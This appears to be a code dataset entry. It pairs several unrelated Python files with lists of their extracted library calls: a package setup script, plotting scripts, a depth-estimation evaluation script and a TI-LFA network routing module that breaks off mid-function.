[((112, 136), 'os.path.exists', 'os.path.exists', (['"""env.py"""'], {}), "('env.py')\n", (126, 136), False, 'import os\n'), ((202, 232), 'os.environ.get', 'os.environ.get', (['"""MONGO_DBNAME"""'], {}), "('MONGO_DBNAME')\n", (216, 232), False, 'import os\n'), ((245, 272), 'os.environ.get', 'os.environ.get', (['"""MONGO_URI"""'], {}), "('MONGO_URI')\n", (259, 272), False, 'import os\n'), ((286, 316), 'pymongo.MongoClient', 'pymongo.MongoClient', (['MONGO_URI'], {}), '(MONGO_URI)\n', (305, 316), False, 'import pymongo\n'), ((325, 355), 'pymongo.MongoClient', 'pymongo.MongoClient', (['MONGO_URI'], {}), '(MONGO_URI)\n', (344, 355), False, 'import pymongo\n'), ((1229, 1293), 'discord.Embed', 'discord.Embed', ([], {'title': 'title', 'description': 'description', 'color': 'color'}), '(title=title, description=description, color=color)\n', (1242, 1293), False, 'import discord\n'), ((1503, 1540), 'pendulum.today', 'pendulum.today', ([], {'tz': '"""America/New_York"""'}), "(tz='America/New_York')\n", (1517, 1540), False, 'import pendulum\n'), ((1557, 1609), 'requests.get', 'requests.get', (['"""https://api.sleeper.app/v1/state/nfl"""'], {}), "('https://api.sleeper.app/v1/state/nfl')\n", (1569, 1609), False, 'import requests\n'), ((782, 836), 're.compile', 're.compile', (['f"""{first_name} {last_name}"""', 're.IGNORECASE'], {}), "(f'{first_name} {last_name}', re.IGNORECASE)\n", (792, 836), False, 'import re\n'), ((846, 890), 're.compile', 're.compile', (['team_abbreviation', 're.IGNORECASE'], {}), '(team_abbreviation, re.IGNORECASE)\n', (856, 890), False, 'import re\n')]
|
import os, shutil
from setuptools import setup, find_packages
#
CUR_PATH = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(CUR_PATH, 'build')
if os.path.isdir(path):
print('INFO del dir ', path)
shutil.rmtree(path)
setup(
name = 'pipeline',
# Author details
author='JiejunHuo',
author_email='<EMAIL>',
version = '0.1',
description='Creating MODIS and 2B-CLDCLASS-lidar co-located files (following the earlier work by Zantedeschi et al. (2019))',
packages = find_packages('src','netcdf'),
package_data = {
# include the *.nc in the netcdf folder
'netcdf': ['*.nc'],
},
include_package_data = True,
#exclude_package_data = {'docs':['1.txt']},
license='MIT',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: System :: Logging',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
py_modules=["pipeline"],
install_requires = [
'netCDF4==1.5.1.2',
'scikit-learn==0.20.0',
'scipy==1.1.0',
],
)
|
[
"os.path.abspath",
"os.path.isdir",
"shutil.rmtree",
"os.path.join",
"setuptools.find_packages"
] |
[((126, 157), 'os.path.join', 'os.path.join', (['CUR_PATH', '"""build"""'], {}), "(CUR_PATH, 'build')\n", (138, 157), False, 'import os, shutil\n'), ((161, 180), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (174, 180), False, 'import os, shutil\n'), ((92, 117), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (107, 117), False, 'import os, shutil\n'), ((220, 239), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (233, 239), False, 'import os, shutil\n'), ((513, 543), 'setuptools.find_packages', 'find_packages', (['"""src"""', '"""netcdf"""'], {}), "('src', 'netcdf')\n", (526, 543), False, 'from setuptools import setup, find_packages\n')]
|
import matplotlib.pyplot as plt
import pandas as pd
from scipy.interpolate import make_interp_spline, BSpline
import numpy as np
def plot_results(title, csv_name):
df = pd.read_csv('../' + csv_name + '.csv')
ax = plt.gca()
df.columns = ['V', 'E', 'Time']
df = df[['V', 'Time']]
df = pd.DataFrame(df.groupby('V').mean()).reset_index()
print(df.head(5))
df.plot(kind='line',x='V',y='Time', color='blue', ax=ax)
ax.set_xlabel("No. of Transactions")
ax.set_ylabel("Time (ms)")
# ax.set_title("IRI Testing Results")
ax.set_title(title + " implementation Test Results")
df = df.sort_values(by=['V'])
tNew = np.linspace(df['V'].min(), df['V'].max(), 7)
spl = make_interp_spline(df['V'].to_numpy(), df['Time'].to_numpy(), k=3) # type: BSpline
edgesSmooth = spl(tNew)
plt.plot(tNew, edgesSmooth, "r-")
plt.savefig(csv_name + '.jpg', dpi=150, bbox_inches='tight')
# plt.show()
if __name__ == "__main__":
# plot_results('IRI', 'benchmarks.real.iri')
plot_results('Proposed', 'benchmarks.real.ours')
|
[
"pandas.read_csv",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.gca"
] |
[((171, 209), 'pandas.read_csv', 'pd.read_csv', (["('../' + csv_name + '.csv')"], {}), "('../' + csv_name + '.csv')\n", (182, 209), True, 'import pandas as pd\n'), ((216, 225), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (223, 225), True, 'import matplotlib.pyplot as plt\n'), ((782, 815), 'matplotlib.pyplot.plot', 'plt.plot', (['tNew', 'edgesSmooth', '"""r-"""'], {}), "(tNew, edgesSmooth, 'r-')\n", (790, 815), True, 'import matplotlib.pyplot as plt\n'), ((817, 877), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(csv_name + '.jpg')"], {'dpi': '(150)', 'bbox_inches': '"""tight"""'}), "(csv_name + '.jpg', dpi=150, bbox_inches='tight')\n", (828, 877), True, 'import matplotlib.pyplot as plt\n')]
|
import argparse
import os
import shutil
import json
import numpy as np
import torch
import torch.nn as nn
import matplotlib.pyplot as plt
from dense_estimation.resnet import resnet50
from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput
from dense_estimation.losses import (BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss,
Log10Loss, DistributionLogLoss)
#from dense_estimation.distributions import GaussianScaleMixture, PowerExponential
from dense_estimation.datasets.nyu_depth_v2 import NYU_Depth_V2
from dense_estimation.data import get_testing_loader
from dense_estimation.app.experiment import get_experiment
from dense_estimation.app.gui import display
from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy
parser = argparse.ArgumentParser(description='testing script')
parser.add_argument('--no_cuda', action='store_true', help='use cpu')
parser.add_argument('--threads', type=int, default=16, help='number of threads for data loader')
parser.add_argument('--seed', type=int, default=123, help='random seed to use')
parser.add_argument('--ex', type=str, default='default',
help='comma separated names of experiments to compare; use name:epoch to specify epoch to load')
parser.add_argument('--gpu', type=str, default='0', help='cuda device to use if using --cuda')
parser.add_argument('--max', type=int, default=20, help='max number of examples to visualize')
parser.add_argument('--samples', type=int, default=1, help='number of monte carlo dropout samples (sampling enabled if > 1)')
opt = parser.parse_args()
cuda = not opt.no_cuda
if cuda:
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu
if not torch.cuda.is_available():
raise Exception("No GPU found, please run without --cuda")
out_size = (208, 256)
transf_size = (out_size[1], out_size[0])
raw_root = '/home/smeister/datasets'
testing_loader = get_testing_loader(NYU_Depth_V2, raw_root, 1, transf_size,
opt.threads, debug=False)
class BasicDist():
def __init__(self, mean, var):
self.mean = mean
self.variance = var
def _test(ex, epoch):
results = []
with open('./log/{}/opts.txt'.format(ex), 'r') as f:
ex_opt = json.load(f)
if ex_opt['dist'] != '':
dist_map = {
'gsm': (GaussianScaleMixture, lambda: GaussianScaleMixtureOutput(ex_opt['num_gaussians'])),
'exp': (PowerExponential, lambda: PowerExponentialOutput()),
}
distribution, output_unit = dist_map[ex_opt['dist'] ]
model = resnet50(output=output_unit(), fpn=ex_opt['fpn'], dropout_active=False)
visualizer = DistributionVisualizer(distribution)
dropout_active = False
else:
output_unit = None
dropout_active = opt.samples > 1
model = resnet50(fpn=ex_opt['fpn'], dropout_active=dropout_active)
if dropout_active:
distribution = BasicDist
visualizer = DistributionVisualizer(BasicDist)
else:
distribution = None
visualizer = BasicVisualizer()
losses_clses = [RMSLoss(), RelLoss(), Log10Loss()]
#if distribution is not None:
# losses_clses += [DistributionLogLoss(distribution)]
testing_multi_criterion = TestingLosses(losses_clses)
if cuda:
model = model.cuda()
testing_multi_criterion = testing_multi_criterion.cuda()
_, _, restore_path, _ = get_experiment(ex, False, epoch=epoch)
state_dict = torch.load(restore_path)
model.load_state_dict(state_dict)
loss_names = [m.__class__.__name__
for m in testing_multi_criterion.scalar_losses]
losses = np.zeros(len(loss_names))
model.eval()
prob = 0
num = opt.max if opt.max != -1 else len(testing_loader)
averages = []
for i, batch in enumerate(testing_loader):
print(i)
if i > num: break
input = torch.autograd.Variable(batch[0], volatile=True)
target = torch.autograd.Variable(batch[1], volatile=True)
if cuda:
input = input.cuda()
target = target.cuda()
# Predictions are computed at half resolution
upsample = nn.UpsamplingBilinear2d(size=target.size()[2:])
samples = []
if dropout_active:
for _ in range(opt.samples):
sample = model(input)
samples.append(sample)
stacked = torch.cat(samples, dim=1)
mean = torch.mean(stacked, dim=1)
var = torch.var(stacked, dim=1)
output = [mean, var]
else:
output = model(input)
if isinstance(output, list):
output = [upsample(x) for x in output]
cpu_outputs = [x.cpu().data for x in output]
d = distribution(*output)
output = d.mean
if output_unit:
prob += torch.mean(d.prob(target[:, 0:1, :, :])).cpu().data[0]
averages.append(d.averages)
else:
output = upsample(output)
cpu_outputs = [output.cpu().data]
losses += testing_multi_criterion(output, target).cpu().data.numpy()
viz_pt = visualizer(input.cpu().data, cpu_outputs, target.cpu().data)
images = visuals_to_numpy(viz_pt)
results.append(images)
losses /= len(testing_loader)
loss_strings = ["{}: {:.4f}".format(n, l)
for n, l in zip(loss_names, losses)]
print("===> [{}] Testing {}"
.format(ex, ', '.join(loss_strings)))
if output_unit:
averages = torch.squeeze(torch.mean(torch.stack(averages, dim=1), dim=1))
prob /= len(testing_loader)
print("===> [{}] Avg. Likelihood {}".format(ex, prob))
print("===> [{}] Dist. Averages {}"
.format(ex, averages.cpu().data.numpy()))
distribution.plot(averages, label=ex)
return results, visualizer.names
if __name__ == '__main__':
results = []
plt.figure()
for spec in opt.ex.split(','):
splits = spec.split(':')
ex = splits[0]
epoch = int(splits[1]) if len(splits) == 2 else None
result, image_names = _test(ex, epoch)
results.append(result)
plt.legend()
plt.show()
display(results, image_names)
|
[
"argparse.ArgumentParser",
"torch.var",
"torch.cat",
"matplotlib.pyplot.figure",
"dense_estimation.losses.Log10Loss",
"dense_estimation.output.PowerExponentialOutput",
"torch.load",
"dense_estimation.output.GaussianScaleMixtureOutput",
"dense_estimation.data.get_testing_loader",
"dense_estimation.app.experiment.get_experiment",
"dense_estimation.resnet.resnet50",
"dense_estimation.logger.visuals_to_numpy",
"torch.mean",
"dense_estimation.losses.RelLoss",
"matplotlib.pyplot.show",
"dense_estimation.losses.TestingLosses",
"torch.autograd.Variable",
"matplotlib.pyplot.legend",
"torch.cuda.is_available",
"dense_estimation.logger.BasicVisualizer",
"dense_estimation.app.gui.display",
"json.load",
"torch.stack",
"dense_estimation.losses.RMSLoss",
"dense_estimation.logger.DistributionVisualizer"
] |
[((841, 894), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""testing script"""'}), "(description='testing script')\n", (864, 894), False, 'import argparse\n'), ((1965, 2053), 'dense_estimation.data.get_testing_loader', 'get_testing_loader', (['NYU_Depth_V2', 'raw_root', '(1)', 'transf_size', 'opt.threads'], {'debug': '(False)'}), '(NYU_Depth_V2, raw_root, 1, transf_size, opt.threads,\n debug=False)\n', (1983, 2053), False, 'from dense_estimation.data import get_testing_loader\n'), ((3346, 3373), 'dense_estimation.losses.TestingLosses', 'TestingLosses', (['losses_clses'], {}), '(losses_clses)\n', (3359, 3373), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3511, 3549), 'dense_estimation.app.experiment.get_experiment', 'get_experiment', (['ex', '(False)'], {'epoch': 'epoch'}), '(ex, False, epoch=epoch)\n', (3525, 3549), False, 'from dense_estimation.app.experiment import get_experiment\n'), ((3567, 3591), 'torch.load', 'torch.load', (['restore_path'], {}), '(restore_path)\n', (3577, 3591), False, 'import torch\n'), ((6048, 6060), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6058, 6060), True, 'import matplotlib.pyplot as plt\n'), ((6296, 6308), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6306, 6308), True, 'import matplotlib.pyplot as plt\n'), ((6313, 6323), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6321, 6323), True, 'import matplotlib.pyplot as plt\n'), ((6328, 6357), 'dense_estimation.app.gui.display', 'display', (['results', 'image_names'], {}), '(results, image_names)\n', (6335, 6357), False, 'from dense_estimation.app.gui import display\n'), ((1752, 1777), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1775, 1777), False, 'import torch\n'), ((2309, 2321), 'json.load', 'json.load', (['f'], {}), '(f)\n', (2318, 2321), False, 'import json\n'), ((2731, 2767), 'dense_estimation.logger.DistributionVisualizer', 'DistributionVisualizer', (['distribution'], {}), '(distribution)\n', (2753, 2767), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((2893, 2951), 'dense_estimation.resnet.resnet50', 'resnet50', ([], {'fpn': "ex_opt['fpn']", 'dropout_active': 'dropout_active'}), "(fpn=ex_opt['fpn'], dropout_active=dropout_active)\n", (2901, 2951), False, 'from dense_estimation.resnet import resnet50\n'), ((3185, 3194), 'dense_estimation.losses.RMSLoss', 'RMSLoss', ([], {}), '()\n', (3192, 3194), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3196, 3205), 'dense_estimation.losses.RelLoss', 'RelLoss', ([], {}), '()\n', (3203, 3205), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3207, 3218), 'dense_estimation.losses.Log10Loss', 'Log10Loss', ([], {}), '()\n', (3216, 3218), False, 'from dense_estimation.losses import BerHuLoss, RMSLoss, RelLoss, TestingLosses, HuberLoss, Log10Loss, DistributionLogLoss\n'), ((3993, 4041), 'torch.autograd.Variable', 'torch.autograd.Variable', (['batch[0]'], {'volatile': '(True)'}), '(batch[0], volatile=True)\n', (4016, 4041), False, 'import torch\n'), ((4059, 4107), 'torch.autograd.Variable', 'torch.autograd.Variable', (['batch[1]'], {'volatile': '(True)'}), '(batch[1], volatile=True)\n', (4082, 4107), False, 'import torch\n'), ((5336, 5360), 'dense_estimation.logger.visuals_to_numpy', 'visuals_to_numpy', (['viz_pt'], {}), '(viz_pt)\n', (5352, 5360), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((3041, 3074), 'dense_estimation.logger.DistributionVisualizer', 'DistributionVisualizer', (['BasicDist'], {}), '(BasicDist)\n', (3063, 3074), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((3146, 3163), 'dense_estimation.logger.BasicVisualizer', 'BasicVisualizer', ([], {}), '()\n', (3161, 3163), False, 'from dense_estimation.logger import DistributionVisualizer, BasicVisualizer, visuals_to_numpy\n'), ((4504, 4529), 'torch.cat', 'torch.cat', (['samples'], {'dim': '(1)'}), '(samples, dim=1)\n', (4513, 4529), False, 'import torch\n'), ((4549, 4575), 'torch.mean', 'torch.mean', (['stacked'], {'dim': '(1)'}), '(stacked, dim=1)\n', (4559, 4575), False, 'import torch\n'), ((4594, 4619), 'torch.var', 'torch.var', (['stacked'], {'dim': '(1)'}), '(stacked, dim=1)\n', (4603, 4619), False, 'import torch\n'), ((5677, 5705), 'torch.stack', 'torch.stack', (['averages'], {'dim': '(1)'}), '(averages, dim=1)\n', (5688, 5705), False, 'import torch\n'), ((2423, 2474), 'dense_estimation.output.GaussianScaleMixtureOutput', 'GaussianScaleMixtureOutput', (["ex_opt['num_gaussians']"], {}), "(ex_opt['num_gaussians'])\n", (2449, 2474), False, 'from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput\n'), ((2523, 2547), 'dense_estimation.output.PowerExponentialOutput', 'PowerExponentialOutput', ([], {}), '()\n', (2545, 2547), False, 'from dense_estimation.output import GaussianScaleMixtureOutput, PowerExponentialOutput\n')]
|
import sys, os
sys.path.append("..")
import helper as h
from constants import SINC
import numpy as np
import matplotlib.pyplot as plt
eigengrid = h.r_window_to_matrix_eig(SINC) # h.window_pad_to_box_rfft(SINC,pad_factor=10.0)
eigengrid_hann = h.r_window_to_matrix_eig(SINC * np.hanning(len(SINC)))
eigengrid_hamm = h.r_window_to_matrix_eig(SINC * np.hamming(len(SINC)))
plt.imshow(abs(eigengrid),aspect="auto")
plt.show(block=True)
plt.subplots(figsize=(10,5))
plt.subplot(121)
plt.semilogy(np.mean(1/abs(eigengrid**2),axis=1),".",label="SINC")
plt.semilogy(np.mean(1/abs(eigengrid_hann**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.semilogy(np.mean(1/abs(eigengrid_hamm**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("All terms Log Scale")
plt.ylabel("Log R[n]")
plt.xlabel("n")
plt.grid(which="both")
plt.legend()
plt.subplot(122)
plt.plot(np.mean(1/abs(eigengrid[:1000]**2),axis=1),".",label="sinc")
plt.plot(np.mean(1/abs(eigengrid_hann[:1000]**2),axis=1),".",alpha=0.4,label="sinc hanning")
plt.plot(np.mean(1/abs(eigengrid_hamm[:1000]**2),axis=1),".",alpha=0.4,label="sinc hamming")
plt.title("First few terms")
plt.ylabel("R[n]")
plt.xlabel("n")
plt.legend()
plt.suptitle("Quantization Error Increase from Inverse PFB",fontsize=18)
plt.tight_layout()
plt.show(block=True)
|
[
"sys.path.append",
"matplotlib.pyplot.subplot",
"matplotlib.pyplot.title",
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.show",
"matplotlib.pyplot.suptitle",
"matplotlib.pyplot.legend",
"helper.r_window_to_matrix_eig",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.grid"
] |
[((15, 36), 'sys.path.append', 'sys.path.append', (['""".."""'], {}), "('..')\n", (30, 36), False, 'import sys, os\n'), ((147, 177), 'helper.r_window_to_matrix_eig', 'h.r_window_to_matrix_eig', (['SINC'], {}), '(SINC)\n', (171, 177), True, 'import helper as h\n'), ((413, 433), 'matplotlib.pyplot.show', 'plt.show', ([], {'block': '(True)'}), '(block=True)\n', (421, 433), True, 'import matplotlib.pyplot as plt\n'), ((435, 464), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'figsize': '(10, 5)'}), '(figsize=(10, 5))\n', (447, 464), True, 'import matplotlib.pyplot as plt\n'), ((464, 480), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(121)'], {}), '(121)\n', (475, 480), True, 'import matplotlib.pyplot as plt\n'), ((728, 760), 'matplotlib.pyplot.title', 'plt.title', (['"""All terms Log Scale"""'], {}), "('All terms Log Scale')\n", (737, 760), True, 'import matplotlib.pyplot as plt\n'), ((761, 783), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Log R[n]"""'], {}), "('Log R[n]')\n", (771, 783), True, 'import matplotlib.pyplot as plt\n'), ((784, 799), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""n"""'], {}), "('n')\n", (794, 799), True, 'import matplotlib.pyplot as plt\n'), ((800, 822), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'which': '"""both"""'}), "(which='both')\n", (808, 822), True, 'import matplotlib.pyplot as plt\n'), ((823, 835), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (833, 835), True, 'import matplotlib.pyplot as plt\n'), ((837, 853), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(122)'], {}), '(122)\n', (848, 853), True, 'import matplotlib.pyplot as plt\n'), ((1110, 1138), 'matplotlib.pyplot.title', 'plt.title', (['"""First few terms"""'], {}), "('First few terms')\n", (1119, 1138), True, 'import matplotlib.pyplot as plt\n'), ((1139, 1157), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""R[n]"""'], {}), "('R[n]')\n", (1149, 1157), True, 'import matplotlib.pyplot as plt\n'), ((1158, 1173), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""n"""'], {}), "('n')\n", (1168, 1173), True, 'import matplotlib.pyplot as plt\n'), ((1174, 1186), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (1184, 1186), True, 'import matplotlib.pyplot as plt\n'), ((1187, 1260), 'matplotlib.pyplot.suptitle', 'plt.suptitle', (['"""Quantization Error Increase from Inverse PFB"""'], {'fontsize': '(18)'}), "('Quantization Error Increase from Inverse PFB', fontsize=18)\n", (1199, 1260), True, 'import matplotlib.pyplot as plt\n'), ((1260, 1278), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (1276, 1278), True, 'import matplotlib.pyplot as plt\n'), ((1279, 1299), 'matplotlib.pyplot.show', 'plt.show', ([], {'block': '(True)'}), '(block=True)\n', (1287, 1299), True, 'import matplotlib.pyplot as plt\n')]
|
import networkx as nx
import os
from diagram import Diagram
from spf import spf
class tilfa:
"""This class provides draft-ietf-rtgwg-segment-routing-ti-lfa TI-LFA calculations"""
def __init__(self, debug=0, ep_space=True, trombone=False):
"""
Init the TI-LFA class.
:param int debug: debug level, 0 is disabled.
:param bool ep_space: Consider nodes in EP space not just P-space
####:param bool trombone: Allow pq_node>dst path to trombone through p_node
:return None: __init__ shouldn't return anything
:rtype: None
"""
self.debug = 0
self.diagram = Diagram(debug=2)
self.ep_space = ep_space
self.path_types = ["tilfas_link", "tilfas_node"]
self.spf = spf(debug=self.debug)
###self.trombone = trombone
def check_sids(self, graph):
"""
Check that each node has a node SID and that each adjacency has an
adjacency SID, and they they are valid and unique.
:param networkx.Graph graph: NetworkX graph object
:return bool True: True if all SIDs are present and unique, else false
:rtype: bool
"""
node_sids = []
for node in graph.nodes():
if "node_sid" not in graph.nodes[node]:
raise Exception(
f"Node {node} is missing a node SID, can't run TI-LFA"
)
if type(graph.nodes[node]["node_sid"]) != int:
raise Exception(
f"Node {node} node SID is not an int, can't run TI-LFA"
)
node_sids.append(graph.nodes[node]["node_sid"])
if len(set(node_sids)) < len(node_sids):
raise Exception(
"Nodes found with non-unique node SIDs: "
f"{[sid for sid in node_sids if node_sids.count(sid) > 1]}"
)
adj_sids = []
for edge in graph.edges():
if "adj_sid" not in graph.edges[edge]:
raise Exception(
f"Link {edge} is missing an adjacency SID, can't run TI-LFA"
)
if type(graph.edges[edge]["adj_sid"]) != int:
raise Exception(
f"Link {edge} adjacency SID is not an int, can't run TI-LFA"
)
adj_sids.append(graph.edges[edge]["adj_sid"])
if len(set(adj_sids)) < len(adj_sids):
raise Exception(
"Links found with non-unique adjacency SIDs: "
f"{[sid for sid in adj_sids if adj_sids.count(sid) > 1]}"
)
def draw(self, graph, outdir, topology):
"""
Loop over the generated topologies and render them as diagram files.
:param networkx.Graph graph: NetworkX graph object
:param str outdir: String of the root output directory path
:param dict topology: Topology paths dict
:return bool True: True if all diagrams rendered otherwise False
:rtype: bool
"""
self.diagram.gen_sub_dirs(graph, outdir, self.path_types, topology)
for src, dst in [
(s, d) for d in graph.nodes for s in graph.nodes if s != d
]:
for path_type in self.path_types:
if path_type not in topology[src][dst]:
continue
if len(topology[src][dst][path_type]) < 1:
continue
tilfa_graph = graph.copy()
# Highlight the failed first-hop link as red
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_link(
"red",
tilfa_graph,
path,
)
# Highlight the failed first-hop node(s) as red
if path_type == "tilfas_node":
for path in topology[src][dst]["spf_metric"]:
tilfa_graph = self.diagram.highlight_fh_node(
"red",
tilfa_graph,
path,
)
for tilfa in topology[src][dst][path_type]:
# Highlight the path(s) from src to the PQ node(s)
for s_p_path in tilfa[0]:
print(f"s_p_path: {s_p_path}")
tilfa_graph = self.diagram.highlight_links(
"purple", tilfa_graph, s_p_path
)
tilfa_graph = self.diagram.highlight_nodes(
"purple", tilfa_graph, s_p_path
)
# Highlight the path(s) from the PQ node(s) to dst
for q_d_path in tilfa[1]:
print(f"q_d_path: {q_d_path}")
tilfa_graph = self.diagram.highlight_links(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_nodes(
"green", tilfa_graph, q_d_path
)
tilfa_graph = self.diagram.highlight_src_dst(
"lightblue", dst, tilfa_graph, src
)
# Add labels to links showing their cost
tilfa_graph = self.diagram.label_link_weights(tilfa_graph)
tilfa_graph = self.diagram.label_link_add_adjsid(tilfa_graph)
tilfa_graph = self.diagram.label_node_id(tilfa_graph)
tilfa_graph = self.diagram.label_node_add_nodesid(tilfa_graph)
self.diagram.gen_diagram(
(src + "_" + dst + "_" + path_type),
tilfa_graph,
os.path.join(outdir, src, path_type),
)
def gen_ep_space(self, dst, f_type, graph, src):
"""
Return a list of nodes in src's Extended P-space which avoid resource X
:param str dst: Dst node in "graph" to calculate EP-space not via X
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" to calculate EP-space from
:return ep_space: List of nodes in src's EP-space with respect to X
:rtype: list
"""
"""
TI-LFA Text:
The Extended P-space P'(R,X) of a node R w.r.t. a resource X is the
set of nodes that are reachable from R or a neighbor of R, without
passing through X.
"""
if f_type == "link":
ep_space = self.gen_link_p_space(dst, graph, src)
elif f_type == "node":
ep_space = self.gen_node_p_space(dst, graph, src)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
for nei in graph.neighbors(src):
if nei == dst:
continue
if f_type == "link":
n_p_space = self.gen_link_p_space(dst, graph, nei)
elif f_type == "node":
n_p_space = self.gen_node_p_space(dst, graph, nei)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
if src in n_p_space:
n_p_space.remove(src)
for ep_node in n_p_space:
"""
Skip EP-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to EP-node:
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
s_ep_paths = self.spf.gen_metric_paths(
dst=ep_node, graph=graph, src=src
)
s_ep_links = [
(path[idx], path[idx + 1])
for path in s_ep_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_ep_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link EP-space node {ep_node} due "
f"to overlap:\n"
f"{s_ep_links},{ep_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
if ep_node not in ep_space:
ep_space.append(ep_node)
return ep_space
def gen_link_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
link(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding S-F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid S-F link to Dst
:return p_space: List of nodes in src's P-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for link protecting P-nodes of {src} not via "
f"link(s): {s_d_fh_links}"
)
p_space = []
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Skip P-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to P-node:
"""
s_p_links = [
(path[idx], path[idx + 1])
for path in s_p_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_p_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting P-space node {p_node} due "
f"to overlap:\n"
f"{s_p_links},{p_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
p_space.append(p_node)
return p_space
def gen_link_pq_space(self, dst, graph, link_q_space, src):
"""
Return the list of Q-space nodes which are link protecting against S-F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_q_space: List of Q-space nodes in "graph" relative to
D not via S-F
:param str src: Source node name in "graph"
:return link_pq_nodes: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.2. Q-Space property computation for a link S-F, over post-convergence
paths
We want to determine which nodes on the post-convergence path from
the PLR to the destination D are in the Q-Space of destination D
w.r.t. link S-F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of S-F, with Q(D, S-F).
"""
link_pq_space = []
# Get the pre-converge path(s) to D
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
# Remove the pre-convergence first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_d_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in link_q_space: # Q-space doesn't include src or dst
if q_node in post_s_d_path:
link_pq_space.append(q_node)
return link_pq_space
def gen_link_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid link(s) S-F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to S-F link
:return q_space: List of nodes in dst's Q-space with respect to S-F
